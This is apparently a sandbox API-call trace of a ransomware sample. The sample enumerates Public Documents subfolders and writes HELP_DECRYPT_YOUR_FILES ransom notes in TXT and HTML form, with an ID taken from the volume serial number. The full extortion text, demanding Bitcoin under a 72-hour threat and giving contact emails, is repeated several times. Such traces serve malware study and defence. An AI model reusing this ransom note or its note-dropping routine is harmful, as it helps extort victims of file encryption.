	[0180.649] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*" (normalized: "c:\\users\\public\\documents\\my music\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0180.649] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.649] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Public\\Documents\\My Music" | out: lpString1="C:\\Users\\Public\\Documents\\My Music") returned="C:\\Users\\Public\\Documents\\My Music"
	[0180.649] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Music", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Music\\*.*") returned="C:\\Users\\Public\\Documents\\My Music\\*.*"
	[0180.649] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.650] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.650] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT") returned 62
	[0180.650] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\my music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.651] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.652] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.654] CloseHandle (hObject=0x384) returned 1
	[0180.654] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.654] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.655] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0180.655] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.655] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\my music\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.656] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.656] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.656] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0180.656] CloseHandle (hObject=0x384) returned 1
	[0180.656] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.657] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.657] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.658] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML") returned 63
	[0180.658] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\my music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.658] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.658] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0180.661] CloseHandle (hObject=0x384) returned 1
	[0180.661] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.661] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.662] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.662] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0180.663] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.663] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Music\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\my music\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.663] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.663] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.663] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0180.664] CloseHandle (hObject=0x384) returned 1
	[0180.664] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Music\\*.*" (normalized: "c:\\users\\public\\documents\\my music\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0180.664] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.664] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1
	[0180.664] lstrcmpW (lpString1="My Pictures", lpString2="..") returned 1
	[0180.664] lstrcmpW (lpString1="My Pictures", lpString2=".") returned 1
	[0180.664] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents"
	[0180.664] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.665] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures"
	[0180.665] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures"
	[0180.665] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\"
	[0180.665] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\Public\\Documents\\My Pictures\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\") returned="C:\\Users\\Public\\Documents\\My Pictures\\"
	[0180.665] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*.*"
	[0180.665] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*" (normalized: "c:\\users\\public\\documents\\my pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0180.665] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.665] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Public\\Documents\\My Pictures" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures") returned="C:\\Users\\Public\\Documents\\My Pictures"
	[0180.665] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Pictures", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Pictures\\*.*") returned="C:\\Users\\Public\\Documents\\My Pictures\\*.*"
	[0180.666] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.666] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.666] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT") returned 65
	[0180.666] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\my pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.668] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0180.668] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0180.671] CloseHandle (hObject=0x384) returned 1
	[0180.671] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.672] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.672] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0180.673] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0180.674] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\public\\documents\\my pictures\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.674] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0180.674] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0180.674] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0180.674] CloseHandle (hObject=0x384) returned 1
	[0180.674] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.675] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.675] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0180.675] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\Public\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML") returned 66
	[0180.675] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\my pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.675] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0180.676] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0180.678] CloseHandle (hObject=0x384) returned 1
	[0180.678] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0180.679] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0180.679] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0180.679] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0180.681] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.681] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\public\\documents\\my pictures\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0180.681] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0180.682] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0180.682] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0180.682] CloseHandle (hObject=0x384) returned 1
	[0180.682] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Pictures\\*.*" (normalized: "c:\\users\\public\\documents\\my pictures\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0180.682] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.682] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d5bfea2, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d5bfea2, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d5bfea2, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1
	[0180.682] lstrcmpW (lpString1="My Videos", lpString2="..") returned 1
	[0180.683] lstrcmpW (lpString1="My Videos", lpString2=".") returned 1
	[0180.683] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\Public\\Documents" | out: lpString1="C:\\Users\\Public\\Documents") returned="C:\\Users\\Public\\Documents"
	[0180.683] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\") returned="C:\\Users\\Public\\Documents\\"
	[0180.683] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\", lpString2="My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos"
	[0180.683] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos"
	[0180.683] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\"
	[0180.683] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\Public\\Documents\\My Videos\\" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\") returned="C:\\Users\\Public\\Documents\\My Videos\\"
	[0180.683] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos\\", lpString2="*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*.*") returned="C:\\Users\\Public\\Documents\\My Videos\\*.*"
	[0180.684] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Documents\\My Videos\\*.*" (normalized: "c:\\users\\public\\documents\\my videos\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="shell32.dll")) returned 0xffffffff
	[0180.684] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0180.684] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\Public\\Documents\\My Videos" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos") returned="C:\\Users\\Public\\Documents\\My Videos"
	[0180.684] lstrcatW (in: lpString1="C:\\Users\\Public\\Documents\\My Videos", lpString2="\\*.*" | out: lpString1="C:\\Users\\Public\\Documents\\My Videos\\*.*") returned="C:\\Users\\Public\\Documents\\My Videos\\*.*"
	[0180.684] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0180.684] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0180.685] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\Public\\Documents\\My Videos\\HELP_DECRYPT_YOUR_FILES.TXT") returned 63
